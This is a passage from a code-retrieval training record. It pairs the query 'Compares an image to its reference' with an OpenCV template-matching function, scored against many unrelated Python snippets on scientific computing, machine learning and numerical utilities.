n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def run_test(d):\n\n ######### Problem Specification\n\n # Data generation parameters\n prior_mu_z = np.zeros(d, dtype=np.float32) # Prior mean\n prior_sigma_z = np.eye(d, dtype=np.float32) # Prior covariance matrix\n\n # True model parameters\n num_range = np.arange(-(d-1)/2, (d+1)/2, dtype=np.float32)\n\n t_delta = num_range / 5 \n\n if d == 1:\n t_sigma = np.ones(1)\n else: \n # Allow sigma to range from 0.1 to 1\n t_sigma = 36/(10*(d-1)**2) * num_range**2 + 0.1 \n\n ######### Variable Initialization\n\n # Initial model parameters - same across all methods\n init_delta = prior_mu_z.copy()\n init_log_sigma = 3 * np.ones(d)\n\n # Initial HVAE variational parameters\n init_T = 5.\n init_eps = 0.005 * np.ones(d)\n max_eps = params['max_eps'] * np.ones(d)\n init_logit_eps = np.log(init_eps/(max_eps - init_eps))\n init_log_T_0 = np.log(init_T - 1)\n\n # Initial NF variational parameters\n init_u_pre_reparam = scipy.stats.truncnorm.rvs(-2, 2, scale=0.1, size=d)\n init_w = scipy.stats.truncnorm.rvs(-2, 2, scale=0.1, size=d)\n init_b = 0.1\n\n # Initial VAE parameters\n init_mu_z = prior_mu_z.copy()\n init_log_sigma_z = np.ones(d)\n\n ######### Set up models\n\n HVAE_model_1 = HVAE(\n ['delta', 'log_sigma', 'logit_eps', 'log_T_0'],\n [init_delta, init_log_sigma, init_logit_eps, init_log_T_0], \n 'HVAE_1', d, params['HVAE_K_1'])\n HVAE_model_2 = HVAE(\n ['delta', 'log_sigma', 'logit_eps', 'log_T_0'],\n [init_delta, init_log_sigma, init_logit_eps, init_log_T_0], \n 'HVAE_2', d, params['HVAE_K_2'])\n\n HVAE_model_notemp_1 = HVAE(\n ['delta', 'log_sigma', 'logit_eps'],\n [init_delta, init_log_sigma, init_logit_eps], \n 'HVAE_notemp_1', d, params['HVAE_K_1'])\n HVAE_model_notemp_2 = HVAE(\n ['delta', 'log_sigma', 'logit_eps'], \n [init_delta, init_log_sigma, init_logit_eps],\n 'HVAE_notemp_2', d, params['HVAE_K_2'])\n\n NF_model_1 = NF(\n ['delta', 'log_sigma', 'u_pre_reparam', 'w', 'b'],\n [init_delta, init_log_sigma, init_u_pre_reparam, init_w, init_b],\n 'NF_1', d, params['NF_K_1'])\n NF_model_2 = NF(\n ['delta', 'log_sigma', 'u_pre_reparam', 'w', 'b'],\n [init_delta, init_log_sigma, init_u_pre_reparam, init_w, init_b],\n 'NF_2', d, params['NF_K_2'])\n\n VB_model = VB(['delta', 'log_sigma', 'mu_z', 'log_sigma_z'], \n [init_delta, init_log_sigma, init_mu_z, init_log_sigma_z], 'VB', d)\n\n model_list = [HVAE_model_1, HVAE_model_2, HVAE_model_notemp_1, \n HVAE_model_notemp_2, NF_model_1, NF_model_2, VB_model]\n \n ######### Generate Training Data & Save - One for each test\n\n train_data_list = []\n\n for i in range(params['n_tests']):\n z = np.random.multivariate_normal(prior_mu_z, prior_sigma_z)\n x = np.random.multivariate_normal(z + t_delta, np.diag(t_sigma**2), \n size=params['n_data'])\n train_data_list.append(x)\n\n # Folder should have already been created in the initializations\n data_path = os.path.join('save', str(d), 'train_data.p')\n pickle.dump(train_data_list, open(data_path, 'wb')) \n\n ######### Train models\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n # Store the final parameter values for all test runs in this dictionary\n final_params = {}\n\n for m in model_list:\n\n final_values = []\n\n for i in range(params['n_tests']):\n (delta, sigma) = m.train(sess, train_data_list[i], i)\n final_values.append((delta, sigma))\n\n final_params[m.model_name] = final_values.copy()\n\n ######### Test models using difference between parameters\n\n param_diffs = {}\n\n for m in model_list:\n\n diffs = []\n\n for i in range(params['n_tests']):\n delta = final_params[m.model_name][i][0]\n sigma = final_params[m.model_name][i][1]\n\n delta_diff = np.sum((delta - t_delta)**2)\n sigma_diff = np.sum((sigma - t_sigma)**2)\n\n diffs.append((delta_diff, sigma_diff))\n\n param_diffs[m.model_name] = diffs.copy()\n\n # Save parameter differences in a pickle file\n diff_path = os.path.join('save', str(d), 'all_diffs.p')\n pickle.dump(param_diffs, open(diff_path, 'wb'))", "def solveForModeB1(X, M, n, maxInner, epsilon, tol,sita,Y1, lambta2):\n # Pi(n) = [A(N) kr A(N-1) kr ... A(n+1) kr A(n-1) kr .. A(1)]^T\n Pi = tensorTools.calculatePi(X, M, n)\n #print 'Pi size', Pi.shape\n #print 'pi='+str(Pi)\n #print(M.U[n])\n for iter in range(maxInner):\n # Phi = (X(n) elem-div (B Pi)) Pi^T\n #print X.vals.shape,X.shape\n #print X.vals.flatten().shape\n Phi = tensorTools.calculatePhi(X, M.U[n], Pi, n, epsilon=epsilon)\n #print('phi'+str(Phi))\n #print(Phi)\n # check for convergence that min(B(n), E - Phi(n)) = 0 [or close]\n kktModeViolation = np.max(np.abs(np.minimum(M.U[n], 1-Phi).flatten()))\n if (kktModeViolation < tol):\n break\n\n B=M.U[n]\n #print B.shape\n colNorm = np.apply_along_axis(np.linalg.norm, 0, B, 1)\n zeroNorm = np.where(colNorm == 0)[0]\n colNorm[zeroNorm] = 1\n B = B / colNorm[np.newaxis, :]\n tm=np.hstack((np.ones((B.shape[0],1)),B))\n Y1=Y1.reshape((Y1.shape[0],1))\n\n derive=-1.0*lambta2/B.shape[0]*np.dot((Y1-np.dot(tm,sita)),sita.T)\n #print derive.shape\n #print np.multiply(M.U[n],derive[:,1:]).shape\n #print np.multiply(M.U[n],Phi).shape\n M.U[n] = np.array(np.multiply(M.U[n],Phi))-np.array((np.multiply(M.U[n],derive[:,1:])))\n\n #print 'after'\n #print M.U[n][0]\n #print(\" Mode={0}, Inner Iter={1}, KKT violation={2}\".format(n, iter, kktModeViolation))\n return M, Phi, iter, kktModeViolation", "def test_successful_verification(self):\n for i in (-2, -1, 0, 1, 2):\n\n description = \"TOTP not verified for `i={0}`\".format(i)\n calculated = self.algorithm.calculate(self.device.secret, drift=i)\n confirmed = self.relate.verify(calculated, save=False)\n\n self.assertTrue(confirmed, description)\n\n self.relate.confirm = False", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def Subtask4_pre_train_5():\n with open(PATH + 'pre_train_4_Subtask4.txt', encoding='utf-8') as fi:\n evi = eval(fi.read())\n\n train_data = np.load(PATH + 'pre_train_2_Subtask4.npy', allow_pickle=True).item()\n model = word2vec.KeyedVectors.load_word2vec_format(PATH + \"data/GoogleNews-vectors-negative300.bin\", binary=True)\n\n with open(PATH + 'pre_train_3_Subtask4.txt', encoding='utf-8') as f:\n document = eval(f.read())\n\n with open(PATH + 'traindata_Subtask4.txt', 'w') as fp:\n for data in train_data.items():\n claim = data[0]\n claim = re.sub(\"[-,.。:_=+*&^%$#@!?()<>/`';|]\", \"\", claim)\n claim = claim.split(' ')\n claim = list(filter(lambda x: x in model.vocab, claim))\n Vi = []\n for i in range(len(claim)):\n Vi.append(model[claim[i]])\n\n V = np.zeros(len(Vi[0]))\n for i in range(len(claim)):\n for j in range(len(Vi[0])):\n V[j] = V[j] + Vi[i][j]\n\n rms = 0\n for i in range(len(Vi[0])):\n rms += V[i] * V[i]\n rms = np.sqrt(rms / len(Vi[0]))\n\n for i in range(len(Vi[0])):\n V[i] = V[i] / rms\n V = V.astype(str).tolist()\n\n for doc in data[1]:\n lines = document[doc].split('\\n')\n for k in range(len(lines)):\n label = [data[0], doc, k]\n line = document[doc].split('\\n')[k]\n if line != str(k) + '\\t':\n line = line.replace(str(k) + '\\t', '')\n line = line.split('\\t')[0]\n line = re.sub(\"[-,.。:_=+*&^%$#@!?()<>/`';|]\", \"\", line)\n line = line.split(' ')\n line = list(filter(lambda x: x in model.vocab, line))\n if len(line) != 0:\n Vi = []\n for i in range(len(line)):\n Vi.append(model[line[i]])\n\n V1 = np.zeros(len(Vi[0]))\n for i in range(len(line)):\n for j in range(len(Vi[0])):\n V1[j] = V1[j] + Vi[i][j]\n\n rms = 0\n for i in range(len(Vi[0])):\n rms += V1[i] * V1[i]\n rms = np.sqrt(rms / len(Vi[0]))\n\n for i in range(len(Vi[0])):\n V1[i] = V1[i] / rms\n V1 = V1.astype(str).tolist()\n\n if label in evi:\n fp.write(' '.join(V) + ' ' + ' '.join(V1) + ' 1' + '\\n')\n else:\n fp.write(' '.join(V) + ' ' + ' '.join(V1) + ' 0' + '\\n')", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def ev2vi_n(eV,mu):\n return np.sqrt(2.*eV*eV2J/(mu*mp))", "def inv_sym(self, ):\n m = self.m\n n = self.n\n kQ = self.kQ\n iQ = self.iQ\n iA = self.iA\n kA = self.kA\n kAt = self.kAt\n iAt = self.iAt\n bndmark = self.bndmark\n rngmark = self.rngmark\n\n verbose = self.verbose\n pdf = self.pdf\n\n separable = True\n degree = np.empty(n+m, dtype=np.int)\n nbrs = np.empty(n+m, dtype=object)\n\n #/*-----------------------------------------------------+\n #| First check to see if the problem is separable. */\n\n for j in range(n):\n for k in range(kQ[j], kQ[j+1]):\n if iQ[k] != j:\n separable = False\n break\n\n #/*----------------------------------------------------+\n #| Select ordering priority (primal or dual) */\n\n\n _dense, _fraction, pfillin, dfillin = 0.0, 0.0, 0.0, 0.0\n\n _fraction = 1.0e0\n for j in range(n):\n _dense = float(kA[j+1]-kA[j])/(m+1)\n _fraction = _fraction*(1.0e0 - _dense*_dense)\n\n pfillin = 0.5*m*m*(1.0e0-_fraction)\n if verbose>2:\n print(\"primal fillin estimate: {:10.0f}\".format(pfillin))\n\n _fraction = 1.0e0\n for i in range(m):\n _dense = float(kAt[i+1]-kAt[i])/(n+1)\n _fraction = _fraction*(1.0e0 - _dense*_dense)\n\n dfillin = 0.5*n*n*(1.0e0-_fraction)\n if verbose>2:\n print(\"dual fillin estimate: {:10.0f}\\n\".format(dfillin))\n\n if pdf == self._UNSET:\n if 3*pfillin <= dfillin and separable:\n pdf = self._PRIMAL\n if verbose>2:\n print(\"Ordering priority favors PRIMAL\")\n else:\n pdf = self._DUAL\n if verbose>2:\n print(\"Ordering priority favors DUAL\")\n\n\n #/*----------------------------------------------+\n #| Initialize nbrs so that nbrs[col][k] con- |\n #| tains the row index of the k_th nonzero in |\n #| column col. |\n #| Initialize degree so that degree[col] con- |\n #| tains the number of nonzeros in column col. |\n #| */\n\n for j in range(n):\n ne = kA[j+1] - kA[j] + kQ[j+1] - kQ[j]\n nbrs[j] = np.empty(ne, dtype=np.int)\n ne = 0\n for k in range(kA[j], kA[j+1]):\n nbrs[j][ne] = n+iA[k]\n ne+=1\n for k in range(kQ[j],kQ[j+1]):\n if iQ[k] != j:\n nbrs[j][ne] = iQ[k]\n ne+=1\n\n degree[j] = ne\n\n for i in range(m):\n ne = kAt[i+1] - kAt[i]\n nbrs[n+i] = np.empty(ne, dtype=np.int)\n degree[n+i] = ne\n ne = 0\n for k in range(kAt[i], kAt[i+1]):\n nbrs[n+i][ne] = iAt[k]\n ne+=1\n\n #/*----------------------------------------------+\n #| Initialize tier to contain the ordering |\n #| priority scheme. |\n #| */\n\n if self.tier is None:\n self.tier = np.empty(n+m, dtype=np.int)\n n1 = 0\n if pdf == self._PRIMAL:\n for j in range(n):\n if bndmark[j] != FREEVAR:\n self.tier[j] = 0 # 0\n else:\n self.tier[j] = 1 # 2\n\n for i in range(m):\n if rngmark[i] == UNCONST:\n self.tier[n+i] = 1 # 4\n n1+=1\n elif rngmark[i] == INFINITE:\n self.tier[n+i] = 1 # 1\n else:\n self.tier[n+i] = 1 # 3\n n1+=1\n\n else:\n for j in range(n):\n if bndmark[j] != FREEVAR:\n self.tier[j] = 1 # 1\n else:\n self.tier[j] = 1 # 3\n n1+=1\n\n for i in range(m):\n if rngmark[i] == UNCONST:\n self.tier[n+i] = 1 # 4\n elif rngmark[i] == INFINITE:\n self.tier[n+i] = 0 # 0\n else:\n self.tier[n+i] = 1 # 2\n\n\n #/*---------------------------------------------------------+\n #| compute maximum column degree of tier zero columns */\n\n if self.dense < 0:\n denfac = 3.0\n colhisto = np.zeros(n+m+1, dtype=np.int)\n\n for i in range(n+m):\n if self.tier[i] == 0:\n colhisto[ degree[i] ] += 1\n\n tot = 0\n _max = n1\n for i in range(n+m):\n tot += colhisto[i]\n if tot >= _max:\n break\n i+=1\n tot = 0\n cnt = 0\n for j in range(n+m):\n if self.tier[j] == 0:\n tot += degree[j]\n cnt+=1\n self.dense = dense = int(denfac*i)\n\n #dense = (int)(denfac*MAX(i,tot/cnt))\n \t\t#printf(\"i = %d, n = %d, m = %d, n1 = %d \\n\", i,n,m,n1)\n \t\t#printf(\"tot = %d, cnt = %d\\n\", tot, cnt)\n del(colhisto)\n\n\n if verbose>2:\n print(\"dense: {:5d}\".format(dense))\n\n #/*----------------------------------------------+\n #| Get memory for mark[]. */\n\n self.mark = np.empty(n+m, dtype=np.int)\n\n self.lltsym(degree,nbrs)\n\n del(degree)\n del(nbrs)\n self.tier = None", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def gen_proof(Tf, H):\n gr, xc, grLf0 = H\n phi = [(integer(0, G.q), grLf0)] + [(m, gr ** t) for m, t in Tf]\n Pf = LIexp(phi, xc)\n return Pf", "def _get_inverse_dynamics(self, t):\n\n # Note DL: The computation of the inverse dynamics is not optimized to be\n # maximally efficient. At the moment this is fine, because we only use this\n # with very small envs. If performance becomes an issue, the following points\n # could be changed:\n # - we still do some unnecessary converting between numpy and\n # scipy.sparse matrices, which negatively impacts performance\n # - it is very likely that the computations could be simplified\n # - instead of computing the inverse dynamics lazily for each timestep, we could\n # compute them eagerly, because we use all of the timesteps anyway.\n # This would improve readability and performance, because we would not have\n # to exponentiate `T_s_next_s` every time. (h/t Rohin)\n\n if t not in self.inverse_dynamics_by_time:\n if self.T_policy_matrix is None:\n raise Exception(\n \"Have to call `make_T_policy_matrix` before `get_inverse_dynamics`\"\n )\n\n # T_s_next_s = P(s' | s, a ~ \\pi)\n T_s_next_s = sum(self.T_policy_matrix[a] for a in range(self.env.nA))\n\n # P_t_s = P_t(s)\n # note that scipy.sparse implements * as matrix multiplication\n P_0_s = self.initial_state_distribution\n P_t_s = P_0_s * T_s_next_s ** t\n\n # P_t_s_a_next_s = P_t(s, a, s') = P(s' | s, a) * pi(a | s) * P_t(s)\n P_t_s_a_next_s = [\n sp.csr_matrix.multiply(self.T_policy_matrix[a], P_t_s.reshape((-1, 1)))\n for a in range(self.env.nA)\n ]\n\n # P_a_next_s = P_t(a, s') = \\sum_s P_t(s, a, s')\n P_t_a_next_s = np.vstack(\n [\n P_t_s_a_next_s[a].sum(axis=0).reshape((1, -1))\n for a in range(self.env.nA)\n ]\n )\n\n # ignore 0/0 errors (filled with 0 in next step)\n with np.errstate(invalid=\"ignore\"):\n # T_inv_t = \\tilde{T}_t(s | a, s') = P_t(s, a, s') / P_t(a, s')\n T_inv_t = [\n P_t_s_a_next_s[a] / P_t_a_next_s[a, :].reshape((1, -1))\n for a in range(self.env.nA)\n ]\n\n # policy_inv_t = \\tilde{\\pi}_t(a | s') = P_t(a, s') / \\sum_a P_t(a, s')\n policy_inv_t = P_t_a_next_s / P_t_a_next_s.sum(axis=0)\n\n # fill nans with 0\n T_inv_t = np.nan_to_num(T_inv_t)\n policy_inv_t = np.nan_to_num(policy_inv_t)\n\n T_inv_t = [sp.csr_matrix(T_inv_t[a]) for a in range(self.env.nA)]\n policy_inv_t = sp.csr_matrix(policy_inv_t)\n\n self.inverse_dynamics_by_time[t] = (T_inv_t, policy_inv_t)\n return self.inverse_dynamics_by_time[t]", "def prove_NA1() -> Proof:\n # Optional Task 6.9a", "def test_inverse( centering='SYMMETRIC'):\n\n\n npupil = 300 #156\n pctr = int(npupil/2)\n npix = 100 #1024\n u = 20 #100 # of lam/D\n\n npix, u = 2000, 200\n s = (npupil,npupil)\n\n\n\n\n mft1 = matrixDFT.MatrixFourierTransform(centering=centering)\n\n ctr = (float(npupil)/2.0, float(npupil)/2.0 )\n #print ctr\n pupil = makedisk(s=s, c=ctr, r=float(npupil)/2.0001, t=np.float64, grey=0)\n pupil /= np.sqrt(pupil.sum())\n\n pupil[100:200, 30:50] = 0\n pupil[0:50, 140:160] = 0\n\n plt.subplot(141)\n plt.imshow(pupil)\n\n print \"Pupil 1 total:\", pupil.sum() \n\n a = mft1.perform(pupil, u, npix)\n\n asf = a.real.copy()\n cpsf = a * a.conjugate()\n psf = cpsf.real.copy()\n print \"PSF total\", psf.sum()\n \n plt.subplot(142)\n plt.imshow(psf, norm=matplotlib.colors.LogNorm(1e-8, 1.0))\n\n plt.subplot(143)\n\n pupil2 = mft1.inverse(a, u, npupil)\n pupil2r = (pupil2 * pupil2.conjugate()).real\n plt.imshow( pupil2r)\n\n print \"Pupil 2 total:\", pupil2r.sum() \n\n\n\n a2 = mft1.perform(pupil2r, u, npix)\n psf2 = (a2*a2.conjugate()).real.copy()\n print \"PSF total\", psf2.sum()\n plt.subplot(144)\n plt.imshow(psf2, norm=matplotlib.colors.LogNorm(1e-8, 1.0))", "def eulerphi(n):\n\treturn euler_phi(n)", "def multInverse(a, m):\n x0 = 1\n x1 = 0\n y0 = 0\n y1 = 1\n\n while m != 0:\n p = a // m\n z = a % m\n a = m\n m = z\n\n w = x1\n x1 = x0 - p * x1\n x0 = w\n \n v = y1\n y1 = y0 - p * y1\n y0 = v\n if(x0):\n return(x0)\n else:\n print(\"multiplicative inverse does not exist\")\n return 0" ]
[ "0.5861715", "0.5764415", "0.5698264", "0.568726", "0.56142557", "0.55775875", "0.54205596", "0.54187477", "0.54100156", "0.5328907", "0.529744", "0.52744836", "0.5273768", "0.526851", "0.5267105", "0.52515525", "0.52438647", "0.5238269", "0.5230068", "0.5224255", "0.52228403", "0.52029735", "0.5194851", "0.5194589", "0.5194009", "0.5180759", "0.51772755", "0.5164743", "0.5145337", "0.51409656", "0.5130892", "0.5130459", "0.5120482", "0.5117446", "0.511679", "0.51151997", "0.5113399", "0.5112108", "0.5111069", "0.51069856", "0.5093601", "0.5081969", "0.5081521", "0.5077038", "0.50709206", "0.5069272", "0.5068255", "0.5062575", "0.5061713", "0.50558543", "0.50297266", "0.5027233", "0.50249094", "0.50245607", "0.5009905", "0.5008993", "0.5008022", "0.50072", "0.49980766", "0.49947757", "0.49834535", "0.49754158", "0.4974131", "0.4972373", "0.49638176", "0.4958542", "0.49578398", "0.49571082", "0.49552116", "0.4954507", "0.49534723", "0.49451163", "0.4938192", "0.4934233", "0.4933153", "0.49326843", "0.4926942", "0.49253172", "0.49241608", "0.49222016", "0.4915393", "0.49139938", "0.4913235", "0.4911765", "0.4910409", "0.49073678", "0.49042797", "0.49036947", "0.4900812", "0.48974645", "0.48953527", "0.48946428", "0.48944727", "0.48883662", "0.48797256", "0.48764238", "0.48745602", "0.48726723", "0.48719597", "0.487154", "0.48655492" ]
0.0
-1
Compares an image to its reference
def compare(self, reference, image): if not os.path.isfile(reference): raise PictureComparatorError("Reference file %s does not exist" % reference) if not os.path.isfile(image): raise PictureComparatorError("Image file %s does not exist" % image) reference_img = cv2.imread(reference, 0) image_img = cv2.imread(image, 0) reference_width, reference_height = reference_img.shape[::-1] image_width, image_height = image_img.shape[::-1] if reference_width < image_width or reference_height < image_height: raise PictureComparatorError("Reference picture must be greater than image to find") method = cv2.TM_CCOEFF_NORMED # Apply template Matching res = cv2.matchTemplate(reference_img, image_img, method) min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res) if max_val > 0.95: return Rectangle(max_loc[0], max_loc[1], image_width, image_height) else: return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
